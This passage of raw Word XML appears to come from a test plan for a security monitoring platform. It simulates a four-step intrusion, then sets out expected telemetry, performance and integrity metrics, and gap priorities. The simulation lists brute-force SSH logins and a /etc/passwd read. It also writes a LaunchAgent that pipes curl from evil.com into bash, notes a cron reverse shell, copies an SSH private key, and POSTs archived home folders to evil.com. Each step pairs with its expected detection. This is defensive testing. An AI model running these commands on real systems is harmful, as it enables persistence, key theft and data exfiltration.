    <w:p w14:paraId="7C4FDACD" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Step 1: Initial Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E89D58C" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in $(seq 1 5); do ssh </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>baduser@target</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>; done  # 5 failed attempts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D22511" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ssh </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>validuser@target</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  # Success with stolen creds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E4C269" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Expected: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AuthGuard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> detects brute force (Rule 1). </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SecurityEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> with T1110.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030309B2" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26979315" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Step 2: Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF266EC" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &amp;&amp; id &amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -a &amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> aux &amp;&amp; cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3163317E" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Expected: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ProcessAgent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> captures commands. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>KernelAudit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> logs </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>syscalls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Rule 8 (APT Initial Access) triggers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456E8CBC" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D19D998" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Step 3: Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BD7922" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>echo '#!/bin/bash\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ncurl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> http://evil.com/beacon|bash' &gt; ~/Library/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LaunchAgents</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>com.update.plist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="36DCC9D2" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>crontab -e  # Add reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F37472B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>cp ~/.ssh/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>id_rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh_key_backup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="16B21A36" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Expected: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PersistenceAgent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> detects </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LaunchAgent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. FIM detects key copy. Rule 2 (Persistence After Auth). Rule 13 (SSH Key Theft).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A43813" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C07FC0E" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Step 4: Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195D860C" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">tar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>czf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/data.tar.gz ~/Documents ~/Desktop ~/.ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EC2F7C" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>curl -X POST -F "file=@/tmp/data.tar.gz" http://evil.com/upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E67993" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Expected: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ProcessAgent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> sees tar + curl. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FlowAgent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> detects large outbound. Rule 15 (Staged Exfiltration). Rule 6 (Data Exfil Spike).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D2A17E" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="758A353D" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Expected Telemetry at Each Layer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4"/>
        <w:gridCol w:w="6451"/>
        <w:gridCol w:w="1953"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FA1094" w14:paraId="111440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52295687" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Layer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16E94C24" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>What Should Appear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0F1AC56B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Verification Point</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="5E1232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0EE37C4" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Agent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DDE2FFF" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>5 auth failures + 1 success, 6 discovery processes, 3 persistence changes, 2 file operations, 1 large flow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FE422A7" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Agent probe output</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="382864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B24ECDD" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>EventBus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29FCAC0" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">All events received via </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>gRPC</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, ACK=OK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7321A50" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Server logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="0F469C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0B1C75B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>WAL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F399E76" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Events stored with BLAKE2b chain intact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080FBBF" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>audit_wal_chain.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="03AE0F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2EA5F2E" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Enrichment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45219B1" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>src_ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> gets </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>GeoIP</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">/ASN. evil.com gets </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ThreatIntel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> match (if in feed)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CB054B3" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>enrichment_status</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> field</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="203FAC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79EFF7B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Correlation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9BBFD82" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Rules 1,2,6,8,13,15 should fire. Device risk score &gt; 80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BF9264F" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>incidents table</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="09E85D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5D6B5F5" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Cortex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90F4986" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">SOC dashboard shows CRITICAL incident. Evidence chain </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>reconstructable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A848B7F" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>/dashboard/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/correlate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="325BCE50" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0706A616" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094"/>
    <w:p w14:paraId="251E575C" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>PHASE 8 — HARDENING METRICS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180A3533" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>8.1 Performance Baseline Metrics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0"/>
        <w:gridCol w:w="3787"/>
        <w:gridCol w:w="1510"/>
        <w:gridCol w:w="2051"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FA1094" w14:paraId="40C52D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5AA791A9" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Metric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698BD9B5" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Definition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352BE260" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Target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6F984CBF" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Measurement Point</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="4E1432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769BA2C" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Event Latency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E181A13" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Time from agent capture to WAL storage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DAD40EA" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>&lt;500ms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AA02E11" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ts_ns</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> delta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="71C737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7F32F8C" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>WAL Write Throughput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774128F" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Events/second sustained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AF8C5CD" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">&gt;1000 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>evt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/s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4C918BF" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>WAL insert rate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="21BD1D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2BB041B" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Chain Verification Cost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B993F92" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Time per batch to verify BLAKE2b chain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128B3FD" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>&lt;10ms/100 events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18DA343" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>process_batch</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> timing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="1BB6AD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F24813E" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Enrichment Overhead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67F167D" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Time to enrich one event through pipeline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48EBA10" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>&lt;5ms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284CCEE" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pipeline.enrich</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>() timing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="6ACAE7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A2A64E2" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Correlation Latency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76D0F16" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Time to evaluate all 26 rules for one device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DE8A8CB" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>&lt;100ms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1A03981" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>evaluate_device</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>() timing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="4405A2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52C5AF4" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>UI Query Latency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1A9F944" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>API response time for dashboard data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0CC6924" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>&lt;200ms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CEA4FD5" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Flask request timing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="234390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73FA4B1" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Dropped Event Rate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F9DD0D9" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Events dropped by WAL backpressure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461F7A9" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>&lt;0.01%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D66FEA2" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>backlog enforcement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="369C9B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216DD5D" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Quarantine Rate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2373144" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Events quarantined by chain/checksum failure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A6A00E7" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>0% (normal ops)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FB179DA" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>quarantine_count</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="31076322" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0372E812" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>8.2 Integrity Metrics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8"/>
        <w:gridCol w:w="4028"/>
        <w:gridCol w:w="2132"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FA1094" w14:paraId="202AC8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6A3DB069" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Metric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5BA59CFC" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Definition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7B845E83" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Alert Threshold</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="21A84D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44DE7C6" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Chain Breaks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BC15BB6" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Hash chain verification failures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3E84B95" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>&gt;0 (immediate alert)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="45E930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0A94E78" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Checksum Mismatches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A343BD8" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>BLAKE2b content verification failures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0E896AD" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>&gt;0 (immediate alert)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="5DA0D7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DE6692D" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Dead Letter Count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B5DAB21" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Events in quarantine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37AEB47" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>&gt;10 (investigate)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA1094" w14:paraId="3D189C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E87ECAB" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Signature Verification Failures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F8F52F5" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Ed25519 sig failures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86E5DFD" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>&gt;0 (when enforced)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7440B7DF" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094">
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71DAEA55" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00FA1094"/>
    <w:p w14:paraId="765CB689" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>PHASE 9 — GAP PRIORITIZATION MATRIX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD3A91E" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>9.1 P0 — Critical (Block release)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8"/>
        <w:gridCol w:w="905"/>
        <w:gridCol w:w="4312"/>
        <w:gridCol w:w="2585"/>
        <w:gridCol w:w="1118"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FA1094" w14:paraId="6C8356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1C0BCDC6" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000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0BE1F1A9" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Category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760093DE" w14:textId="77777777" w:rsidR="00FA1094" w:rsidRDefault="00000000">
            <w:r>
